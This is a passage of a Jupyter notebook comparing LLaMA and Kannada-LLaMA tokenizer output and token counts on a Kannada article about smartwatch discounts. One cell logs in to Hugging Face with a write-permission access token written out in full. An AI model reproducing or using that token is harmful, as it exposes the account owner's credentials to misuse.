'<0x95>', '<0xE0>', '<0xB3>', '<0x83>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAC>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAC>', 'ರ', '್', '▁', '1', '2', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>']\n",
"LLaMA tokenizer n_tokens=2789\n",
"Tokenized by kannada-LLaMA tokenizer:['<0x0A>', 'ರಸ', '್ತು', 'ತ', '▁ದಿನಗಳಲ್ಲಿ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ಫೋನ್', '\\u200c', 'ಗಳು', '▁ಮಾತ್ರವಲ್ಲ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳು', '▁ಕೂಡ', '▁ಸಿಕ್ಕ', 'ಾಪ', 'ಟ್ಟೆ', '▁ಸೌಂಡ್', '\\u200c', '▁ಮಾಡುತ್ತಿವೆ', '.', '▁ಫಿಟ್', 'ನೆ', 'ಸ್', '\\u200c', '▁ಆಧಾರಿತ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಟೆಕ್', '\\u200c', '▁ವಲಯದಲ್ಲಿ', '▁ಭಾರಿ', '▁ಬೇಡಿಕೆ', '▁ಇದೆ', '.', '▁ಇದೇ', '▁ಕಾರಣಕ್ಕೆ', '▁ಹಲವು', '▁ಕಂಪ', 'ೆ', 'ನಿ', 'ಗಳು', '▁ವೈ', 'ವಿಧ', '್ಯ', 'ಮಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ಪರಿ', 'ಚ', 'ಯಿ', 'ಸಿ', 'ವೆ', '.', '▁ಇವುಗಳಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕೂಡ', '▁ಬ', 'ಳ', 'ಕೆ', 'ದಾರರ', '▁ನೆ', 'ಚ್ಚಿ', 'ನ', '▁ಬ್ರಾಂಡ್', '\\u200c', '▁ಎ', 'ನಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಸದ್ಯ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ತನ್ನ', '▁ವಿ', 'ಭಿ', 'ನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಂದ', '▁ಗುರು', 'ತಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಇ', 'ದೀ', 'ಗ', '▁ತನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಭರ', '್', 'ಜ', 'ರಿ', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ಅನ್ನು', '▁ನೀಡುತ್ತಿದೆ', '.', '<0x0A>', 'ಹೌದು', ',', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕಂಪ', 'ೆ', 'ನಿ', '▁ತನ್ನ', '▁ಕೆಲವು', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಬಿಗ್', '\\u200c', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ನೀಡುತ್ತಿದೆ', '.', '▁ನೀವು', '▁ಕೂಡ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಖ', 'ರೀ', 'ದಿ', 'ಸಲು', '▁ಬ', 'ಯ', 'ಸಿ', 'ದರ', 'ೆ', '▁ಇದು', '▁ಉತ್', 'ತ', 'ಮ', '▁ಸಮಯ', 'ವಾಗಿದೆ', '.', '▁ಅದರಲ್ಲೂ', '▁ಜನಪ್ರಿಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಾದ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', ',', '▁ಬಿ', 'ಪ್', '▁ಯು', '▁ಪ್ರೊ', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', 'ಯು', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಘ', 'ೋ', 'ಷಿ', 'ಸಿ', 'ದೆ', '.', '▁ಹಾಗಾದ್ರೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಯಾವ', 'ೆಲ್ಲಾ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದೊರೆಯ', 'ುತ್ತಿದೆ', '▁ಅನ್ನ', 'ೊ', 'ದ', 'ನ್ನ', '▁ಈ', '▁ಲೇ', 'ಖ', 'ನ', 'ದಲ್ಲಿ', '▁ತಿಳಿಸಿಕೊಡ', '್ತೀವಿ', '▁ಓದಿ', 'ರಿ', '.', '<0x0A>', 'ಆ', 'ನ್', '\\u200c', 'ಲೈನ್', '\\u200c', '▁ಶಾಪಿಂಗ್', '\\u200c', '▁ದ', 'ೈ', 'ತ್ಯ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', '▁ಸೈಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಬ್ರಾಂಡ್', '▁ಡೇ', '▁ಸೇಲ್', '▁ಲೈವ್', '\\u200c', '▁ಆಗಿದೆ', '.', '▁ಅಲ್ಲದೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '▁ಫಿಟ್', '▁ನ', '▁ಅಧಿಕ', 'ೃ', 'ತ', '▁ವೆಬ್', '▁ಸೈಟ್', '▁ನಲ್ಲಿ', '▁ಕೂಡ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಸೇಲ್', '\\u200c', '▁ಲೈವ್', '▁ಆಗಿದೆ', '.', '▁ಈ', '▁ಸೇಲ್', '\\u200c', '▁ಇದೇ', '▁ಸೆ', 'ಪ್', 'ಟೆ', 'ಂಬರ್', '▁12', '▁ರವರೆಗೆ', '▁ನಡೆಯಲಿದೆ', '.', '▁ಇದರಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಮಾತ್ರ', '▁ಲಭ್ಯವಿದೆ', '.', '▁ಆದರೆ', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಪ್ರೊ', '▁ಫ್ಲ', 'ಿ', 'ಪ್', '\\u200c', 'ಕಾರ್', 'ಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಲಭ್ಯವಾಗಲಿದೆ', '.', '<0x0A>']\n",
"kannada LLaMA tokenizer n_tokens=398\n"
]
}
],
"source": [
"print(tokenizer.all_special_ids)\n",
"print(tokenizer.special_tokens_map)\n",
"text = \"\"\"\n",
"ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.\n",
"ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.\n",
"ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.\n",
"\"\"\"\n",
"print(\"Test text:\\n\", text)\n",
"llama_tokenized = llama_tokenizer.tokenize(text)\n",
"kannada_llama_tokenized = kannada_llama_tokenizer.tokenize(text)\n",
"print(f\"Tokenized by LLaMA tokenizer:{llama_tokenized}\")\n",
"print(f\"LLaMA tokenizer n_tokens={len(llama_tokenized)}\")\n",
"print(f\"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}\")\n",
"print(f\"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}\")"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...\n",
"To disable this warning, you can either:\n",
"\t- Avoid using `tokenizers` before the fork if possible\n",
"\t- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"Token will not been saved to git credential helper. Pass `add_to_git_credential=True` if you want to set the git credential as well.\n",
"Token is valid (permission: write).\n",
"Your token has been saved to /home/adithya/.cache/huggingface/token\n",
"Login successful\n"
]
}
],
"source": [
"!huggingface-cli login --token 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"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"## Loading From Hugging Face\n",
"\n",
"fast_llama_tokenizer = LlamaTokenizer.from_pretrained(\"hf-internal-testing/llama-tokenizer\")"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [],
"source": [
"kannada_llama_tokenizer_hf = LlamaTokenizer.from_pretrained(\"CognitiveLab/Project_K_Tokenizer\")"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tokenized by LLaMA tokenizer:['▁', '<0x0A>', 'ರ', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x95>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xA3>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA7>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', 